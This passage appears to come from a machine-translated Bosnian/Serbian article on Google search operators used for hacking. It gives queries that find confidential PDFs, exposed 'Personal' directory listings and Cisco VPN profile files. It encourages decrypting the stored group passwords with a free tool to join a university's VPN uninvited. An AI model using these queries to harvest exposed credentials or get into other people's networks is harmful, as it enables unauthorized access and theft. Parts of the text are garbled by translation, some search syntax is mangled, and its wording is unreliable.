Ako trebate napisati pametnu skriptu, bit će korisno znati da je raspon datuma postavljen u Googleu u julijanskom formatu pomoću operatora raspona datuma. Na primjer, ovako možete pronaći listu PDF dokumenata sa riječju povjerljivo, preuzetih od 1. januara do 1. jula 2015. godine.

Povjerljivi tip datoteke:pdf daterange:2457024-2457205

Opseg je naznačen u julijanskom formatu datuma bez uzimanja u obzir razlomka. Nezgodno je prevesti ih ručno sa gregorijanskog kalendara. Lakše je koristiti konvertor datuma.

Ponovno ciljanje i filtriranje

Pored navođenja dodatnih operatora u upitu za pretraživanje, oni se mogu poslati direktno u tijelo veze. Na primjer, filetype:pdf specifikacija odgovara konstrukciji as_filetype=pdf . Zbog toga je zgodno tražiti bilo kakva pojašnjenja. Recimo da je izlaz rezultata samo iz Republike Honduras specificiran dodavanjem konstrukcije cr=countryHN URL-u pretrage, a samo iz grada Bobruisk - gcs=Bobruisk. Kompletnu listu možete pronaći u odjeljku za programere.

Googleovi alati za automatizaciju dizajnirani su da olakšaju život, ali često dodaju probleme. Na primjer, IP adresa korisnika se koristi za određivanje njegovog grada putem WHOIS-a. Na osnovu ovih informacija, Google ne samo da balansira opterećenje između servera, već i mijenja rezultate pretraživanja. Ovisno o regiji, za isti zahtjev, različiti rezultati će se pojaviti na prvoj stranici, a neki od njih mogu biti potpuno skriveni. Dvoslovni kod iza direktive gl=country pomoći će vam da se osjećate kao kosmopolita i da tražite informacije iz bilo koje zemlje. Na primjer, kod Holandije je NL, ali Vatikan i Sjeverna Koreja nemaju svoj kod u Guglu.

Često se rezultati pretraživanja završe pretrpani čak i nakon upotrebe nekoliko naprednih filtera. U ovom slučaju, zahtjev je lako razjasniti dodavanjem nekoliko riječi izuzetaka (ispred svake od njih se stavlja znak minus). Na primjer, bankarstvo, imena i tutorial se često koriste uz riječ Personal. Stoga će čistiji rezultati pretraživanja biti prikazani ne udžbeničkim primjerom upita, već rafiniranim:

Naslov:"Indeks /Personal/" -nazivi -vodič -bankarstvo

Poslednji primer

Sofisticiranog hakera odlikuje činjenica da sam sebi obezbjeđuje sve što mu je potrebno. Na primjer, VPN je zgodna stvar, ali ili skupa, ili privremena i sa ograničenjima. Registracija za pretplatu za sebe je preskupa. Dobro je što postoje grupne pretplate, a uz pomoć Googlea lako je postati dio grupe. Da biste to učinili, samo pronađite konfiguracijsku datoteku Cisco VPN-a, koja ima prilično nestandardnu ​​PCF ekstenziju i prepoznatljivu putanju: Program Files\Cisco Systems\VPN Client\Profiles. Jedan zahtjev i pridružite se, na primjer, prijateljskom timu Univerziteta u Bonu.

Tip datoteke:pcf vpn ILI grupa

INFORMACIJE koje Google pronalazi konfiguracijske datoteke sa lozinkama, ali mnoge od njih su napisane u šifriranom obliku ili zamijenjene hashovima. Ako vidite nizove fiksne dužine, odmah potražite uslugu dešifriranja.

Lozinke se pohranjuju šifrovane, ali Maurice Massard je već napisao program za njihovo dešifriranje i pruža ga besplatno putem thecampusgeeks.com.

At Google pomoć stotine su pogubljene različite vrste napadi i testovi penetracije. Postoji mnogo opcija koje utiču popularni programi, osnovni formati baza podataka, brojne ranjivosti PHP-a, oblaka i tako dalje. Ako tačno znate šta tražite, biće vam mnogo lakše doći potrebne informacije(posebno onaj koji nije planiran da bude objavljen). Shodan nije jedini koji hrani zanimljive ideje, već svaku bazu podataka indeksiranih mrežnih resursa!